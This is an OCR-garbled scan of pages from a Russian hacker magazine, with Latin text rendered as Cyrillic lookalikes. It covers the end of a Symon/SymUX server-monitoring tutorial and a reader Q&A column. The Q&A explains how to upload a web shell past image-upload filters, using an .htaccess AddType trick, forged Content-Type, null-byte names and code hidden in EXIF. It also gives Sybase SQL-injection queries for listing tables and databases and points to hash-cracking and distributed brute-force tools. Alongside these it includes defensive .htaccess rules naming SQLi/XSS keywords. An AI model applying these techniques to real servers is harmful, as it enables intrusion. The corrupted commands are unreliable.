Кстати, сразу видны корни ОрепВЗВ, ведь в списках нет ірІаЫез или ірі^ѵѵ, 
только рк Вином случае придется отключать этот модуль, чтобы не возник- 



Если сбор данных будет производиться на другом сервере, то вместо 
[оса [Ьозі: указываем ІР-адрес (или В N5- имя), на который сл едует отправ- 
лять собранные данные: «зігеат [о 192. 168. 10. 10 21 00» (не забудь открыть 
в брандмауэре этот порт). Поумолчанию, собранная информация отправ- 
ляется каждые 5 секунд. Если необходимости в таком частом опросе нет, 
можно указать другое время, вписав в правило па ра метр Іі те с указанием 
секунд. Проверяем правильность конфига: 

# /изг/1оса1/1іЬехес/зутоп -к 
/екс / зутоп . сопк : ок 

Порядок, можно стартовать. При запуске без параметров зутоп перехо- 
дит в режим демона, поэтому не сразу понятно, чем он там занимается. 
Чтобы протестировать его работу, лучше выполнить команду с ключами 
' -к ' и ' -и ' : 

# /изг/1оса1/1іЬехес/зутоп -к -и 
зутоп ѵегзіоп 2.79 

ргодгат ік=9530 

кеЬид: зутоп раскек ЗІ2Ѳ=362 

зепкіпд раскекз ко икр 127 .0.0.1 2100 
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дгігкіегфдгіпасгг/іАгАікаІ/зіідгЁ/зугпйлф зиіс /и^г/ІйсаІ/Ып/зуіпих -сі 

зушх ѵегз^іоп '2,1^ 

рг-одг^ш 

[^еЬіід: аіге сІіигпЬиГ^ег = 1569 
( 1 « 1 >идз ям ігот бхЬ7Т0ВѲ№ и 
РсЬид: купих раске^ &іге=1679 

и5і«гіп9 'ГОГ лпсойипэ іуінол ггмт он ілщр і гібѳ 

11яС«піпд 'Гог ІПС04ПІП9 сспгкоііонз оп іср 127.6.6.1 2166 
Ооі>іідз дсчО йаіга гесоіѵвО тгош 127,6^6 л еЛ 6Э95 
[1«Ьіід: г«1сивп(і = 6; зіаПеРсИепСз -= 6 
сіоРидз 5і:гіпдЬиГ - бхі>7Гі®бЭ0 

[ХЫід: гг^ровіе •' / ѵаг/ѵм^/зу тог/ ггРз/ІоовІГкзі/ОГ^зРвб. гг4 123Э4646Э1: 15636616:666 
12бег66612ба:6:6:6:а 

0ОІ>уд: ггОбрсіа<в - / ѵ&г/ъАА#/5у тон/ г ічйАОСаіГЮ$г/ІО_Эйа9, г Г<1 1233464631:39411: и326; 
3:67166544:54525652 

сіерид: ггоурйа^о - / ѵ*г/ѵА«/$у тон/ г ічй А«эі Гкй^/ Іо_5йаѲ, гг(і 1233454631:16762:62736; 
3:526572544:256674646 

ооруд: гг(Цзрсіа<е /ѵаг/^/5утон/гг<іЗАОСаіРОЗІ/ІО_5і^7, ГГХІ 1233454631:616547; 125:Ѳ 
: 636562816:2676232 

ОеРуд: ггОчрйэи /ѵаг/и»/5угтіон/ггй5/\«а1Ьо5І/1о_5ііа6, гіті 1233454631;5962:6;6;674 
2916:9 

йеЬид: ггОирсІэІе ■■ /увг/чни/5утоп/гг(йА«е1Гкщ1/1о_5С»э1,гг'й 1233454631: 2417:6; 9: 176 
3328:9 

||Д 414ч^44 4і 

Запуск Зутих с ключом '-сД 

зСагСесі тосіиіе іо(ѵ^сіО) 

И такдалее. Если сообщений об ошибке не получено, можно запускать в 
рабочем режиме: 

# /изг/1оса1/1іЬехес/зутоп 

Все данные направляются в сетевой порт, и работоспособность демона 
в этой ситуации можно отследить анализом вывода «Ісрбиппр — і ІоО» 
— прителнетившись к2100 порту, или проверив наличие файла /ѵаг/гип/ 
зутоп.ріб и процесса зутоп в выводе «рз аи». Осталось лишь добавить 
зутоп в автозагрузку: 

#ѵі /еіс/гс.іосаі 

і:Е [ -X /изг/1оса1/1іЬехес/зутоп ] ; Сііеп 

есііо 'зСагСіпд зутоп'; /изг/1оса1/1іЬехес/зутоп 

Данные отправлены, самое время их поймать! 

НАСТРАИВАЕМ БУМиХ 

Приступаем к настройке 5утих. Конфигурационный файл зутих.сопі' 
описывает источники, с которых будут приниматься данные, сами дан- 
ные и каталог/файл, куда их сохранять. В одном файле могут содержаться 
ссылки на несколько источников: 

# ѵі /еіс/зутих.соп^ 

# На каком порту слушать входяіцие соединения зутоп 

# тих 192.168.10.10 2100 
тих 127.0.0.1 2100 

# Определяем входяіцие данные для каждого источника 
зоигсе 127.0.0.1 { 

ассерр { 

# Описываем, какую именно информацию принимаем (здесь 
просто перечисляем источники из зутоп. сопі) 

сри(О), тет, тЬиІ, р1, (іІ(зсіОа), сі1(з(і0(і), сіІ(зсіОе), 
зепзог ( ІтО . РетрО ) , зепзог ( ІтО . Ретрі ) , зепзог ( ІтО . РапО ) , 
ргос ( зриісі) , ргос (РіРРрсі) , ргос ( зратсі) , ргос (тузрісі) , 
ргос ( сіатсі) , 

іР(РхрО), іР(РхрІ), іР(Рхр2), іР(РипО), 
іо (Ѵ7СІ0 ) , іо Ыдіі ) 

} 

# Каталог , в который будем сохранять данные 
баРабіг " /ѵаг/ілплплі/зутоп/ггбз/ІосаІРюзР " 

# Опционально можно указать и названия файлов 

# ѵ7гіРе зепзог (ІтО . Рапі) іп " /ѵаг/'ыѵлѵ/зутоп/ггбз/ 
1оса1РюзР/зепзог_1т0 . РапО . ггб" 

} 




[Меню ВумУеЬ позволяет выбрать временной интервал и вид графиков] 



# Аналогично описываются все остальные сервера с запуіцен- 
ным зутоп 

Конфигурационный файл составлен, проверяем: 

# /изг/1оса1/1іЬехес/зутих -Р 

Ѵ7агпіпд: /еРс/зутих . сопР : 7 : Рііе '/ѵаг/ѵллм/зутоп/ггбз/ 

1оса1РюзР/бР_зб0е . ггб' , диеззебаппоР Ье орепеб 
Ѵ7агпіпд: /еРс/ зутих . сопР : по Рііепате зресіРіеб Рог зРгеат 
’бР (збОе) ■ 

Кроме собственно конфига, эта команда проверит наличие всех указан- 
ных ресурсов, а также прав доступа к каталогу, в который будут сохранять- 
ся данные. Такого каталога пока нет, создаем его: 

# ткбіг -р /ѵаг/ілПлПлі/зутоп/ггбз/ІосаІРюзР 

Демон зутих не может самостоятельно создавать ВВВ-файлы. Для это- 
го используется специальный скрипт с_5тггб5.зЬ, входящий в поставку 
зутоп. Команда для запуска выглядиттак: 

с_зтггбз.з1і [опебау] [іпРегѵаІ <зесопбз>] [а11] <ггб Рі1ез> 

В данном случае поступаем просто: 

# об /изг/іосаі/збаге/зутоп/ 

# . /с_зтггбз . зб а11 

В итоге скриптвыдастсписоксозданныхфайлов. Проверяем снова: 

# /изг/1оса1/1іЬехес/зутих -Р 
/ еР с /зутих. сопР : ок 

Можно работать, добавляем зутих в автозагрузку: 

#ѵі /еІс/гс.ІосаІ 

ІР [ -X /изг/1оса1/1іЬехес/зутих ] ; Рбеп 

есбо ' зРагРіпд зутих' ; /изг/1оса1/1іЬехес/зутих 

Рі 

Также, каки зутоп, симуксу при запуске можно передать ряд параметров. 
Например, ключ позволяетпросмотретьсписокактивныхфайлов, куда 
собираются данные в текущей конфигурации. Чтобы увидеть отладочную 
информацию, первый запускпроизведем с ключом ‘-б’. 

# /изг/1оса1/1іЬехес/зутих -б 
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Ркрипт рЬрЗутоп также выдает наглядные графики] 



(іеЬид: ггсіирсіа1:е — /ѵаг/'№лПл?/зутоп/ггсіз/ 

1оса11іоз^/сі:Е_з(і0е . ггсі 

1233494631:15630616:8801288:8801288:0:0:0:0 
Данные пришли. Теперь на них нужно как-то посмотреть. 

АНАЛИЗИРУЕМ ДАННЫЕ 

Как уже говорилось, для анализа собранной информа- 
ции проект предлагает несколько скриптов. Один из них 
(модуль ЗутихСИепТрт и скрипт деІзутопТепп.рІ) после 
установки можно найти в /изг/ІосаІ/зЬаге/зутоп/сиепІ:. 
Скрипт довольно прост в работе; в общем случае вызов 
выглядиттак: 

. /деСзутопіСет.рІ <зутих 1іозР> <зутих рогС> 
<теазигесі ТюзР> <зСгеат> <іРет> 

# ссі /изг/1оса1/з]таге/зутоп/с1іепР 

# . /деРзутопіРет. р1 127.0.0.1 2100 127.0.0.1 
' сри ( о ) ' изег 

12.80 

В качестве последнего параметра используем информа- 
цию из «тап 8 зутих». Применительно к СРО это: изег, пісе, 
зузіет, іпІеггирТ ібіе. 

Более наглядно представляют информацию скрипты, напи- 
санные на РНР, — зу\л/еЬ или рЬрЗутоп. 

Для их работы нам понадобится связка АрасЬе + РНР, описа- 
ние настройки которой неоднократно приводилось в нашем 
журнале, поэтому останавливаться на этом не будем. Скачи- 
ваем и распаковываем архив зуѵѵеЬ: 

# ѵ\?деЦ -с ІоССр: //ѵллм.хз4а11 .п1/~ѵфсі/зутоп/ 
р]ті1ез/зуѵ\?еЬ-0 . 58 . Саг . дт. 

# Саг 2x1 зуѵ\?еЬ-0 . 58 . Саг . д 2 

Копируем находящиеся внутри каталоги Ыбосз и зутоп в 
□оситепіРооІ: веб-сервера: 

# ссі зуѵ\?еЬ 

# ср -гѵ Ысіосз/зуѵ^еЬ /ѵаг/ѵллпл? 

# ср -гѵ зутоп /ѵаг/ѵллпл? 




Следим за работой сервер 



Веб-сервер должен считывать с них да иные, поэтому меняем 
владельца каталога (в Ргее/СрепВ5В апач работаетотимени 
учетной записи ѵѵѵѵѵѵ): 

# сііоѵ^п -к ѵллпл?:ѵллпл^ /ѵаг/ѵллПл?/зуѵ^еЬ/ 

# сііоѵ^п -К ѵллм:ѵллпл? /ѵаг/ѵллм/ зутоп/ 

В файле зуѵѵеЬ/зеІир.і ПС необходимо изменить несколько пере- 
менных под наши реалии. В нем есть несколько заготовок для 
различныхсистем Ргее/СрепВ5В и ситуаций (ссЬгооІ: или без): 

# ѵі /ѵаг/ѵѵѵѵѵѵ/зуѵѵеЬ/зеІир.іпс 

$зутоп [ ' гг(і1:оо1_ра1:}і ' ] = ' /изг/1оса1/Ып/ 
ггсіРооІ ' ; 

$зутоп [ ' сас]те_(ііг ' ] = ' /ѵаг/ѵллм/зутоп/сасііе ' ; 
$зутоп [ ']тозР_1гее ' ] = ' /ѵаг/ѵллпл?/ зутоп/ ггсіз ' ; 

$ зутоп [ ' 1ауои1_(ііг ' ] = ' /ѵаг/ѵллм/ зутоп ' ; 

Все указанные каталоги у нас уже созданы, остался каталог 
для кэша: 

# тксііг /ѵаг/ѵллпл?/ зутоп /саске 

# сііоѵ^п /ѵаг/ѵллПл?/зутоп/сас]те 

Если веб-серверзапускается всЬгоор дополнительноследу- 
етзапуститьскрипт, находящийся в архиве іпз1;аи_ггб1;оо[.5Ь, 
который перенесет библиотеки ггб в сЬгооІ-окружение. 

Все готово, заходим на страницу Ы:1:р://[оса[Ьо5І:/5уѵѵеЬ и 
смотрим красивые графики. Используя меню, можно из- 
менить временной промежуток и их размер. В отдельный 
пункт вынесена статистика РР. Если необходимо защитить 
эту информацию от посторонних лиц, можно использовать 
.Ыассезз: 

# ѵі /ѵаг/ѵѵѵѵѵѵ/зуѵѵеЬ/.Ыассезз 

АиіШате "Зуѵ\?еЬ гопе" 

АиИтТуре Вазіс 

АиіШзегРіІе /изг/1оса1/е1с/арас1іе/}і11р(і_ 
ассезз 

гедиіге ѵаіісі-изег 

Пароль создаем при помощи утилиты Ыраззѵѵб, входящей в 
состав АрасЬе: 

# крраззѵ^сі -с /изг/1оса1/е1с/арас1іе/]т11р(і_ 
ассезз асітіп 

Как видишь, Зутоп довольно простой и понятный в настрой- 
ках инструмент, при помощи которого можно снимать ста- 
тистику основных системных параметров сразу с нескольких 
серверов. 




> Ііпкз 

• Сайт проекта 
Зутоп — ѵѵѵѵѵѵ. хз4а и. 
пІ/~ѵѵрб/5утоп. 

• Сайт проекта 
рЬрЗутоп — ѵѵѵѵѵѵ. 
гуапКаппегу.пе!/ 
ууогкв/рбрзутоп. 




>ѵісіео 

На прилагаемом 
кжурналу диске ты 
найдешь видеоролик, 
где показано, как 
с помощью зутоп 
настроить систему мо- 
ниторинга серверов. 




> ІП^О 

• Названия процес- 
сов для ргос смотрим 
при помощи рз, 
названия сетевых 
интерфейсов вспоми- 
наются по іісопбд, а 
диски поможет найти 
Ібізк или бтезд. 

• Списоксенсоров 
специфичен для 
каждого железа, 
получить его можно 
при помощи команды 
«зузси Ьуѵ.зепзогз». 

• Подробнее о 
ВВВТооІ читай в 
статье «Универсаль- 
ный наблюдатель» 
(3^11_2008). 
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ли в СУБД БуЬазе таблицы, аналогич- 
ньіеІМ?0^АТІОМ.5СНЕМА.ТаЬІе5(соІитп5)? 

А: Аналогичн\^юЛункцию в ЗуЬазе выпол- 
няеттаблица 5у5оЪ^^с1:5. Выборка ведется с 
указанием нужной базьі данных. Итоговый 
запрос будем примерно\аким (какправило, 
возникают проблемы несс^падения типов, но 
это уже другой вопрос) — зеХесІ; патеігот Ьб.. 
5у5оЬ)ес1;5\л/беге 1;уре=и. Здесь «Ьб» — это БД, в 
которой мы смотрим имена тарлиц. И — это тип, 
обозначающий пользовательские таблицы, 
которые нам и нужны. Если появляется ошибка, 
то берется Ьех-значение И — 0x55. Тогда (...) 
ѵѵбеге 1:уре=0х55. 



О: А как узнать сами базы Данных? 

А: Используем запрос вроде: зеіесі: бЬпате 
Ігот тазіег.зузіодіпз. ^отрим следующую 
базу — зеіесі: бЬпате^от тазіег.зузіодіпз 
ѵѵЬеге бЬпате поі; ілПберем_бех_значе- 
ние_базы полу>генной_запросом_выше). Чтобы 
увидеть следующих баз, добавляем в 

ско^й<имена предыдущих баз, взятых в бех. 

То есть: зеіесі: бЬпате Ігот плаз ^ег.зу зіодіпз 
ѵѵбеге бЬпате поі: іп (бЫ_взятое /в:^ездЬ2_ 

. Получится пр 







зеіесі: бЬпате Ігот таз1;ег..зуз[одіпзѵѵбеге 
бЬпате поі: іп (0x646231 ,0х64626е6 1666532,...). 

О: В Сети полно бесплатных сервисов по 
взлому М05-хэшей. Существуют ли платные 
сервисы? 

А:Да, такие сервисы есть, но ихсовсем не- 
много. Один из них — Ы:1:р://ЬазЬсЬескег.сопп . 
Доступные цены: базовый аккаунт (50 хэшей) 

— $15, премиум аккаунт (100 хэшей) — $25. Там 
же есть возможность приобрести ВаіпЬоѵѵ- 
таблицы (к примеру, 196таблиц на 16 ВѴО стоят 
$500). 

О: В руки попало несколько серверов. Есть 
ли софт для распределения брута хэшей на 
несколько машин? 

А: Можно посоветовать специальную версию 
утилиты бобп Тбе Піррег— ОізІгіЬиІеб боЬп 
( Ы:1:р:/ЛгезЬппеаТпе1:/рго]ес1:з/б]оЬп ). 

О: Реал ьно Л И сейчас взломать ѴѴЕР под 
ѴѴіпсІоѵѵз МоЬіІе? 

А: В системе ѴѴМоЬіІе нет поддержки топіЬг 
тобе, необходимого ѴѴіРі-картам для сбора 
пакетов. 



О: Через апачевый .И^ассезз можно как-ни- 
будь обезопасить сервер от популярных атак 
(кроме как блокировать доступ по ІР-адресу 
в определенные папки)? 

А: Товарищ Вопаіб ѵап беп Нееікаппр привел 
пример подобного файла: 

ОрСіопз +Ро11оѵ\?ЗутЬіпкз 
Кеѵ\?гіЦеЕпдіпе Оп 
Кеѵ^гіСеСопсі % {0иЕКУ_ЗТКІЫС} 

(«|%22) .*(>|%ЗЕ|<|%ЗС) .* [ЫС] 
Ееѵ/гіСеКиІе ^(.*)$ Тод.рЬр [N0] 
Ееѵ^гіСеСопсі % {0иЕЕУ_ЗТЕІЫС} 

(< I %ЗС) . *зсгірЦ. * (>| %ЗЕ) [N0] 
Ееѵ\?гіЦеЕи1е '^ ( . * ) $ Іод.рЬр [N0] 
Ееѵ^гіСеСопсі % {0иЕЕУ_ЗТЕІЫС} 

( 3 аѵазсгірЦ :).*(;). * [ЫС] 
Ееѵ/гіСеКиІе ^(.*)$ Тод.ркр [МС] 
Ееѵ^гіСеСопсі % {0иЕЕУ_ЗТЕІЫС} 

(; I ' I " І%22) 

(ипіоп I зеІесС I іпзегС | сігор I 
ирсбаСе I тс15 I Ьепсіітагк | ог | апсі | 

ІТ) . * [ЫС] 

Ееѵ\?гіЦеЕи1е '^ ( . * ) $ Іод.ркр [N0] 
Ееѵ\?гіЦеЕи1е ( , I ; I < I > I ' I ' ) 

/Іод.ркр [N3] 






0: Интересно написание эксплоитов на РНР 
под веб-приложения, но мало где нашел 
информацию (кроме анализа уже написан- 
ных сплоитовЬ Есть ли полезная литература 
по теме? 

А: Очевидно, что нужно смотреть в сторону 
толстыхучебников по РНР :). Какправило, 
основа работы подобных эксплоитов сводится 
кобычной эмуляции браузера. Соответственно, 
ищи в книжных изданиях главу с подробно 
расписанной темой «Работа с НТТР. Сетевые 
функции. Эмуляция браузера». 

0: Как обезопасить сервер от брутфорса 55Н? 

А: Есть несколько скриптов — они анализируют 
логавторизации и блокируют доступ с ір-ад- 
ресов, с которых в течение короткого отрезка 
времени было множество неудачных попыток 
авторизации. Сдин из них — В1оск55Н0 (Ыіді// 
ЫоскззЬсІ.БоигсеІ'огде.пеі ]. Это перловый де- 
мон, весьма удобный вуправлении и конфигу- 
рировании. Послеустановки открываем конфиг 
(/еІс/ЫоскззЬсІ/ЫоскззбсІ.сопІ) и смотрим 
основные параметры: 

тах_аЦЦетрСз => ' 4 ' 

/ / число неудачных попыток автори- 
зации; 

ипЫоск => ' 1 ' 

// время, по истечении которого за- 
блокированные ір будут раз банены ; 
зепб_ета11 => ' 1 ' 

/ / отправлять уведомления об атаку- 
ющем на етаіі (О — не уведомлять) ; 
етаіі => ' тутаі1@таі1 . сот ' 

// наш етаіі; 

етаі1_ѵ/]тоіз_1оокир => ' О ' 

/ / отключаем отправку вывода 
ѵ\?Ь.оіз на етаіі; 

Ключи командной строки просты: 

• -б I --баетоп | --збагб 
/ / запускаем как демон 

• --збор 

• -к I --кеір 

• -V I --ѵегзіоп 

0: Нашел бажный движок, в котором есть 
аплоадер изображений. Насколько я знаю, 
в списокзапрещенных для загрузки файлов 
входят рИр, регі и сді. Как можно прогрузить 
веб-шелл? 

А:Тебе повезло, что «защита» настолько при- 
митивна. Дай расширение веб- шеллу, к приме- 
ру, дік и загрузи .Ы;ассеззтакого содержания: 

<Рі1ез зЬ.е11.діі> 

АббТуре арріісабіоп/ 
х-кббрб-ркр .діі 
</Рі1ез> 

Таким образом, мы запустим скрипт. 



0: Какие, вообще, приемы используются для 
загрузки веб-шелла через скрипты, предна- 
значенные для аплоада изображений? 

А: Все зависит от используемых функций в 
скрипте загрузки. Про самое примитивное 
было написано выше (когда есть список 
недопустимых расширений). Иногда админы 
запрещают какие только можно расширения, 
но при этом забывают про старый добрый сді 
(на делетакие ошибки редко встречаются 

— как правило, в сценарии указан массив с 
допустимыми расширениями, и все осталь- 
ные режутся). Далее идет проверка поля за- 
головка СопІепкТуре. В самом скрипте будет 
примернотакой код: 

<?ркр 

і^ ( $_РІЬЕЗ [ ' изегіііе ' ] 

[ ' буре ' ] ! = " ітаде / ді б " ) { 
есбю ' Еггог ! ' ; 
ехіб ; 

} 

Если мы попробуем напрямую загрузить 
шелл, в заголовке будет строка Сопіепі-Туре: 
ІехДрІаіп, и проверку МІМЕ-ти па пройти не 
получится. Но ничто нам не мешаетэтот самый 
заголовок подделать и указать «СопІепкТуре: 
ітаде/діП>. 

Дальше глянем на функции тоѵе_ир[оасІесІ_б[е 
и сору. Да-да,ты правильно понял, речь пойдет 
о пиЕ-байте («%00», «\х00»). Предположим, в 
скрипте, ответственном за загрузку изображе- 
ний, есть та кой код: 

<?ркр 

/ / здесь идет проверка расширения 

іб ($а11оѵ\?еб) 

{ 

//если проверка пройдена 
тоѵе_ир1оабеб_бі1е 
( $_ЕІЬЕЗ [ ' ивегбііе ' ] 

[ 'бтр_пате' ] , $ир1оаббі1е) ; 
еско 'бріоабеб! ' ; 

} 

еізе { 

есбю ' Еггог ’ ' ; 

} 

?> 

Если мы попробуем загрузить рЬр-файл, то 
не будет пройдена проверка, но если вста- 
вить пик-байт (5беи.рЬр%00.)рд), то файл 
загрузится. 

Следующая функция, которая часто ис- 
пользуется веб-мастерами в скриптах 

— дейтадезіге. Функция дебтадезігеО 
определяет размер изображения ОІЕ, 4Р0, 
РМ6, 5ѴѴЕ, Р5В,Т1ЕЕили ВМРи возвраща- 
ет размеры, тип файла и высоту/ширину. К 
примеру, есть код: 



<?рбір 

$ітадеіпбо= 

дебітадезізе ( $ ) ЕІЬЕЗ [ ' изегбііе ' ] 

[ ' бтр_пате ' ] ) ; 
іб 

( $ітадеіпбо [ ' тіте ' ] 

! = ' ітаде/діб ' 

&& ітадеіпбо [ ' тіте ' ] 

! = ' ітаде/ іред ' ) { 
есбю ' Еггог ! ' ; 
ехіб ; 

} 

// код 
?> 

Берем обычную картинку, вставляем в ЕХІЕ-тег 
(заголовки, предназначенные для хране- 
ния комментариев к изображению и прочей 
«полезной» информации вроде модели камеры 
— редактируются фотошопом, АСВЭее ит.п.) 
строчку веб-шелла, даем расширение рЬр, 
если требуется подделываем СопІепкТуре и 
загружаем файл. 

Функции могут сочетаться, поэтому комбинируй 
способы. 

0: А как собственно защититься от таких 
багов? 

А: Можно использовать специальный скрипт, 
который будет извлекать картинки в Ьазе64 
из базы данных. Также предлагаем исполь- 
зовать скрипт, накладывающий рандомную 
ХОЕ-маску на картинки. Это обезопасит 
от прямого выполнения, ведь любой код, 
внедренный в изображение, станет не валид- 
ным. В БД в таком случае нужно хранить саму 
маску и путь до файла. Существует еще заме- 
чательный проектБиЬозіп ( Ьир://Ьагбепеб- 
рЬр.пеДзиЬозіп ). способный защитить от 
множества возможных атак: 

• Защита от зді-іпз есбіоп 

• Шифрование соокіе 

• Проверка содержимого загружаемых 
файлов 

• Запрет удаленного и локального 
инклудинга 

• Отключение еѵаі ( ) 

• Отключение у ргед_гер1асе моди- 
фикатора / е 

• Выключение поддержки рбіріпбо ( ) 

• Защита от перезаписи переменных 

• Добавление поддержки шифрования 

• Защита от использования пиІІ-Ьубе 

• Защита от уязвимости НТТР 
Кезропзе Зрііббіпд 

Впечатляет? И это только часть возможностей 
зибозіп! В будущем планируется внедрение 
защиты от подделки всевозможных заголовков, 
переменных; автоматическая блокировка на- 
падающего при обнаружении загрузки файла, 
содержащего код и т.д. 
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0: Знакомый рассказал прс^55 через 
соокіез. Как такое возмоншо? 

А: Все просто — данные, ВуВодимые пользо- 
вателем, сохраняются у і/его в куках, после 
чего при последующі^посещениях хоста эти 
самые данные берутся из куков и вставляются 
в страницу. 

0: Сіса^ал скрипты одной СМ5, нашел инк- 
Ііуд-баг, но заюзать его не получается. Фай- 
лы не инклудятся. В чем может быть дело? 

А: Самое очевидное — выключен ВедІ5І:ег_ 
дІоЬаІз. Второе — где-то ранее в уязвимом 
сценарии находится объявление перемен- 
ной, которую мы хотим проинклудить. Иногда 
это значение прописано в самом скрипте, 
иногда — в конфиге, который инклудится 
в бажный скрипт, а иногда — берется из 
базы данных. Все переменные определены 
заранее. Скрипт отделался легким испу- 
гом, и тебе не удается опорочить его своим 
длинным инклуденгом :). Ксожалению, не 
все багоискатели удосуживаются провести 
полный анализ кода, и в итоге мы полу- 
чаем появляющиеся на багтраках липо- 
вые асіѵізогу (многие просто проходят по 
скриптам обычным парсингом потенциально 
опасных функций). 

0: Я всегда стремился получить качест- 
венный мобильный интернет за разумные 
деньги. Практика показывает, что одним 
решением в этом случае не обойтись: зона 
приема сильно дифференцирована. Поэ- 
тому, помимо 36-девайса, приобрел модем 
Затзипд со встроенным приемником ѴѴіМах 
для провайдера Уоіа. Под Виндой никаких 
загвоздок, но это, увы, это единственная 
официально поддерживаемая ОС. Что же 
теперь — отказываться от любимой ІІЬипІи? 
А: Если не брать в расчет варианте исполь- 
зованием виртуальной машины, то остается, 
пожалуй, один достойный способ — воспользо- 
ваться альтернативным драйвером тасіѵѵітах 
[ Ыір://сосІе.доод[е.сопп/р/ппасІ\л/іппах ). Отмечу, 
что на свет он появился не самым традицион- 
ным способом — это реверс-инжинированный 
Ыпих-драйвер для Затзипд 5ѴѴС-0200 — 05В- 
адаптера для доступа к сетям МоЬіІе ѴѴітах. 
Драйвер пишется полностью в изег-зрасе, что 
позволяетупростить разработку, используя 
библиотеку [іЬизЬ-1 .0. Но отсюда возникает и 
ограничение: библиотека поддерживаеттолько 
□ них, поэтому другие юниксоиды пока остают- 
ся неудел. Какзаставить телефон работать в 
системе? 

Вот краткая инструкция: 

1. В первом терминале надозапустить драйвер: 

зийо раЦ]т/Цо/ѵ^ітах 

Драйвер будет писать сообщения. Кактолько 
увидишь «Зіаіе: МОВМАЕ», будь уверен: модем 



3. Последняя команда: \ 
зиЙФ (іІісІіепЦ ДарО 

После этого можно пользо^ться инетом. Чтобы 
упростить свД^изнь^яЛроизвод^ настрой- 
ку автоматически, можно написать скрипты. 
Хороший пример можно найти в этой статье 

— ба ЬгаЬаЬг.гц/Ыодз/ѴѴі МАХ/50504 . 

0: А если воспользоваться виртуальной 
машиной, то можно ведь настроить маршру- 
тизацию из гостевой Винды и юзать инет под 
Ьіпих'ом? 

А: Именно это и имелось в виду! Ниже я при- 
веду простой способ, как пробросить инет из 
виртуальной ѴѴіпбоѵѵзХР: 

1 . Ставим любую виртуальную машину с 

п о дд е ржко ЙІІ5В, например, ѴігІиаІВ ох (уллАл/ 
ѵігІиаІЬох.огд ]. 

2. Устанавливаем в качестве гостевой системы 

— Винду. 

3. Конфигурируем в нашей основной системе 
сетевой интерфейс: 

зисіо ДипеДІ -Д ДарО -и гего 
зийо іДсопДід ДарО 192.168.0.1 ир 
зийо сЬтой Оббб /сІеѵ/пеД /Дип 

4. Находим в ѴігШаІВох раздел «Сеть», выбира- 
ем Ьозі: іпіегіасе и указываем интерфейс ІарО. 

5. Запускаем виртуальную машину. 

6. В панели управления ХР находим наш 
сетевой адаптер и указываем ІР: например, 
192.168.0.1. 

7. Для удобства настраиваем в системе любой 
ргоху-сервер. Самое простое — ЗтаІІРгоху 
( зтаиргохѵ.гц ). 

8. Подключаем к компьютеру 05 В-модем и, как 
обычно, устанавливаем драйвера. 

9. Далее в прокси настраиваем соединение 
через Уоіа. 

10. Сворачиваем виртуальную машину 
и указываем в основной системе прокси 

— 192.168.0.1:3128. 



0: Хочу добавить в свой 1?55-агрегатор 
(использую боодіе Кеабег) ленту из моего 
ЖЖ. Никаких проблем с этим нет, кроме 
того, что в нее не транслируется самое 
интересное — посты «Ѵгіепсіз опіу^^. Как 
это исправить? 

А: Средствами самого ЖЖ — никак. Зато 
можно набросать скрипт, который будет 
авторизироваться в сервисе, парсить данные 
и компоновать в В55-поток. Или еще вариант 
— воспользоваться сервисом Уабоо Рірев 




КУ 



О 



[ рірез.ѵабоо.сот ]. что вообще избавля^^от х 
необходимости писать код вручную. Оба спо- 
соба требуют небольшой сноровки и врем-еьиУ; 
а что если хочется сделать все прямо сейчас? 
Ксчастью, в Сети есть один замечательный 
сервис — Р55 Ргоху [ бир://г55-ргохѵ.сІагкк. 
пеДгц ]. Он как раз и позволяет добавить 
френдлентуЖЖ или любой другой Р55-поток, 
который требует аутентификации, в любимый 
агрегатор. Сервис совершенно бесплат- 
ный, причем оценить безопасность кода ты 
можешь сам, изучив исходники: Ы:1:р://діІ:ЬиЬ. 
сот/багкк/г55-ргохѵ . 

О: Существует ЛИ возможность отправ- 
лять 5М5-сообщения по протоколу ХМРР 
(^аЬЬег)? 

А: Такой фишки у самого протокола нет— но 
есть сервисы, которые принимают сообщения 
по протоколу ХМРР. Уверен, если поискать, их 
найдется очень много. Что там говорить: при 
правильном подходе такой гейт можно быстро 
сварганить, связав простенькие скрипты на 
РуШоп’е и всем известный Сііскаіеіі ВиІк5М5 
Оаіеѵѵау [ ѵѵѵѵѵѵ.сііскаіеи.сопп ]. предлагающий 
разработчикам отличный ІР. Из готовых реше- 
нийялично пробовал МеззадіпдВау [ Ыір:// 
ѵѵѵѵѵѵ.ппеззадіпдЬаѵ.сопп ). и это действительно 
очень просто. Все инструкции и расценки (об- 
рати внимание, что цены указаны в сингапурс- 
ких центах) ты найдешь на официальном сайте. 
Да, правильно заметил, — это платно. Хочется 
халявы? Есть ита кие способы: 

1. Завести аккаунтна Маіі.ги. 

2. Прицепить клюбому)аЬЬег-аккаунтутранс- 
порт таіі.ги агента с сервера ]аЬЬег.ги . 

3. В ростере )аЬЬега кликнуть правой кнопкой, 
и в меню выбрать «Транспортѣ Выполнить 
команду Ѣ Отправить 5М5». 

Учти: ограничение — 50 сообщений в день и 
большая вероятностьбытьзабаненным :). 

0: Приятно, ЧТО большое внимание ][ стал 
уделять КІА-приложениям. А теперь такой 
вопрос — можно ли скомпилировать такой 
проект, чтобы он запускался на мобильных 
устройствах? 

А: До недавнего времени это было невозмож- 
но. Но буквально на днях на странице Аб обе 
ЕаЬз появился замечательный инструмент 
□ізІгіЬиІаЫе Ріауег ( би:р://[аЬз.абоЬе.сопп/ 
ІесЬпоІодіез/бізІгіЬиІаЫерІаѵег) . который, 
наконец, позволил создавать ВІА-приложения 
для мобильныхустройств. Пакет состоит из 
двух частей: 

• Еіазб ЕЕе 3.1 ВізІгіЬиІаЫе Ріауег. Собственно 
плеер для запуска приложений. 

• АбоЬе МоЬіІе Раскадег. Десктопное приложе- 
ние, преобразовывающее 5ѴѴЕ в файл-уста- 
новщикдля девайсов на базеѴѴіпбоѵѵз МоЬіІе 
и ЗутЬіап 560. Опробовать новинку в действии 
ты можешь прямо сейчас — все доступно для 
скачивания! ^ 
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Подписка на журнал «ХАКЕР+ОѴО» на 6 месяцев 
стоит 1200 руб. 



По всем вопсосам 




ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 

2100 руб. [на 15% дешевле чем 
при покупке в розницу) 



Единая цена по всей России. Доставка за счет издателя, 
в том числе курьером по Москве в пределах МКАД 



ВНИМАНИЕ! 

ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 

При подписке на комплект журналов 

ЖЕЛЕЗО + ХАКЕР + ОѴО: 

- Один номер всего за 155 рублей (на 25% дешевле, чем в розницу) 

ЗА 12 МЕСЯЦЕВ ЗА 6 МЕСЯЦЕВ 



